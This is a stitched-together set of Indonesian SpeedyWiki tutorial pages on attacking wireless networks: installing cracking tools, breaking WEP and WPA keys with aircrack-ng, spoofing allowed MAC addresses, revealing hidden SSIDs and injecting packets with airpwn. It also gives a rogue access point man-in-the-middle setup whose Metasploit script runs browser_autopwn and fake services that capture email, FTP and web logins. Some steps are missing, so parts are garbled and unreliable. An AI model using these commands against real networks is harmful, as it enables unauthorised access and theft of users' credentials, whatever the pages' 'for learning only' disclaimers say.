Professional Documents
Culture Documents
Aplikasi Yang Perlu Disiapkan: From Speedywiki
Aplikasi Yang Perlu Disiapkan: From Speedywiki
From SpeedyWiki
# cd /usr/local/src
# svn co https://802.11ninja.net/svn/lorcon/trunk lorcon
# wget http://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gz
# wget http://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgz
# wget http://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgz
# wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-
20070414.tar.gz
# wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-
1.6.1.tar.bz2
# wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-
1.1.0.tar.bz2
# cd /usr/local/src/lorcon/
# ./configure \
-prefix=/usr \
-sysconfdir=/etc/lorcon \
-localstatedir=/var \
-mandir=/usr/share/man\
-infodir=/usr/share/info
# make
# make install
# cd /usr/local/src/
# tar zxvf airpwn-1.3.tgz
# cd /usr/local/src/airpwn-1.3
# tar zxvf lorcon-current.tgz
# cp -Rf /usr/local/src/lorcon/* /usr/local/src/airpwn-1.3/lorcon
# cd /usr/local/src/airpwn-1.3/lorcon
# ./configure \
-prefix=/usr \
-sysconfdir=/etc/lorcon \
-localstatedir=/var \
-mandir=/usr/share/man\
-infodir=/usr/share/info
# make
# make install
# cd /usr/local/src/airpwn-1.3
# ./configure
# make
# make install
# cd /usr/local/src/
# tar zxvf wifitap-0.4.0.tgz
Instalasi aircrack-ng
From SpeedyWiki
Instalasi
[edit] Referensi
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
Bagi anda yang menggunakan chipset Atheros tampaknya perlu menginstalasi driver MadWiFi.
http://ath5k.org/wiki/MadWifi
http://sourceforge.net/project/showfiles.php?group_id=82936
# cp madwifi-0.9.4.tar.gz /usr/local/src/
# cd /usr/local/src
# tar zxvf madwifi-0.9.4.tar.gz
# cd /usr/local/src/madwifi-0.9.4
Load module
# modprobe ath_pci
Menyambung ke HotSpot
From SpeedyWiki
Untuk menyambungkan diri ke HotSpot menggunakan text mode. Langkah yang biasa
digunakan
1. Scanning frekuensi
# iwlist scanning
2. Set ESSID interface wireless (misalnya eth1) agar sama dengan HotSpot
# iwconfig eth1
# dhclient eth1
[edit] Beberapa Cara untuk Cek Sambungan
1. Cek apakah routing ke Internet sudah di berikan oleh DHCP Server. Perhatikan IP gateway
untuk tujuan 0.0.0.0 apakah sudah di berikan, menggunakan perintah,
# netstat -nr
# ping <ip-gateway>
Scanning HotSpot
From SpeedyWiki
iwlist
# iwlist scanning
Kismet
# kismet
airodump
Scanning
# airodump-ng mon0
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik
berikut ini membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika
ada yang sedang melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali,
sampai kapanpun akan susah untuk di crack WEP-nya.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita,
dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2
export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0.
Kita harus menggunakan interface mon0 untuk melakukan monitor.
Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan
proses cracking WEP pastikan kita dapat menangkap lebih dari 5000 paket.
misalnya
# aircrack-ng -a 1 -n 64 hasilcapture-01.ivs
Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada
yang sedang transfer file di jaringan HotSpot.
Teknik Menjebol WEP
From SpeedyWiki
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk
digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus
berharapan sendiri dengan aparat penegak hukum.
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita,
dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2
# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=1
Teknik mencari data BSSID & CHANNEL di atas menggunakan perintah, misalnya, card
WLAN di eth1. Pastikan bahwa eth1 berada pada mode monitor
Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk
memanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan
adalah
Setelah kita cukup banyak berhasil menangkap paket. Proses cracking WEP dapat dilakukan
menggunakan
# aircrack-ng -a 1 -n 64 hasilcapture.ivs
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk
digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus
berharapan sendiri dengan aparat penegak hukum.
Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa
mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-
nya.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita,
dan (3) Channel yang digunakan AP.
Misalnya,
BSSID 00:30:4F:4E:2B:50
WIFI 00:11:6b:33:d3:90
CHANNEL 2
export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0.
Kita harus menggunakan interface mon0 untuk melakukan monitor.
Dimana
-a MAC AP
-c MAC client
Kunci dari proses cracking WPA adalah ketersediaan kamus silahkan di cek ke
http://www.aircrack-ng.org/doku.php?id=faq
http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network
http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
[edit] Referensi
http://www.aircrack-ng.org/doku.php?id=faq
http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network
http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
Teknik Man-in-The-Middle Attack / FakeAP
From SpeedyWiki
Contents
[hide]
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
use auxiliary/server/browser_autopwn
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
./msfconsole -r evilwireless.rc
[edit] Referensi
http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-
tutorial.html
http://0x80.org/blog/?p=131 - The Evil Access Point
http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-
script.html - How to create Face AP
http://ww2.mastaputa.com:9999/?p=29
http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-
and-airchat
Teknik Melewati Pembatasan MAC Address
From SpeedyWiki
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya
diperuntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk
digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus
berhadapan sendiri dengan aparat penegak hukum.
Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang
diijinkan lewat oleh AP menggunakan Kismet adalah
# kismet
Lakukan
space
S - untuk men-sort
S - untuk men-sort terhadap SSID
Panah Bawah - Letakan di SSID AP yang kita inginkan.
ENTER - detail AP
C - lihat siapa saja client AP tersebut
Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client
yang diijinkan AP
Alternatif lain
# ifconfig eth1 down
# macchanger -mac 00:16:CF:C1:FA:F5 eth1
# ifconfig eth1 up
# macchanger -r eth1
Bagi rekan-rekan yang ingin melihat video tutorial-nya. Rekan Rumput Kering dari Yogyafree
membuat Tutorial Video Mengubah MAC Address menggunakan macchanger
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk
digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus
berharapan sendiri dengan aparat penegak hukum.
Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet
# kismet
Hidden SSID akan berwarna biru dan di tutup oleh tanda <> seperti tampak pada gambar.
tampilan kismet, warna biru adalah Hidden SSID
Bagi anda yang cukup beruntung dapat juga menggunakan cara di bawah ini. Tapi kemungkinan
gagal lumayan tinggi.
Pada Windows yang lain lakukan aireplay asumsinya AP dengan MAC 00:11:6B:60:86:91
melalui eth1
Persiapan
———
- Distro Fedora 8 (Werewolf)
- Wireless USB Dongle (ralink chipset)
- driver ralink
- airpwn
- lorcon
# vi /usr/include/linux/wireless.h
tambahkan baris
#define IFNAMSIZ 16
MULAI BERAKSI
=============
* Colokin Wireless USB Dongle ke lobang usb
# ifconfig rausb0 up
# iwconfig rausb0 mode monitor
# cd airpwn-1.30
# airpwn -c conf/great_html -d rt73 -i rausb0 -v -v -v
keterangan dari parameter airpwn.
-c = memanggil file konfigurasi dari airpwn.
-d = driver yang digunakan wireless, kebetulan saya menggunakan chipset ralink.
-i = nama device yang digunakan, dalam hal ini ralink telah disupport oleh lorcon
untuk menginject paket wireless.
-v = verbose mode, semakin banyak parameter -v maka semakin cepat pula verbose
yang ditampilkan.
- thK’s :
irvan 4k4 z3r0byt3 (udah ngasih tau cara ngejalanin airpwn)
edday (minjemin leptopnya buat uji coba di kampus)
4de (soryy buat fedora 9, ora iso lungo *&^$(#^%@)
b00gi3 (begadang lagi yuk, ngoprek bareng, soo elo jangan bawa hengpun ????)
y0gie (hhehe.. lgi binun yaaa.. nyari atheross.., pengen bles dendem ???)
m3lar (maenin truzz prensternya ntar ajarin gua yaa…)
ti0 & t0y4n9 (rame luhh berdua, seruuuu)
and all for support me……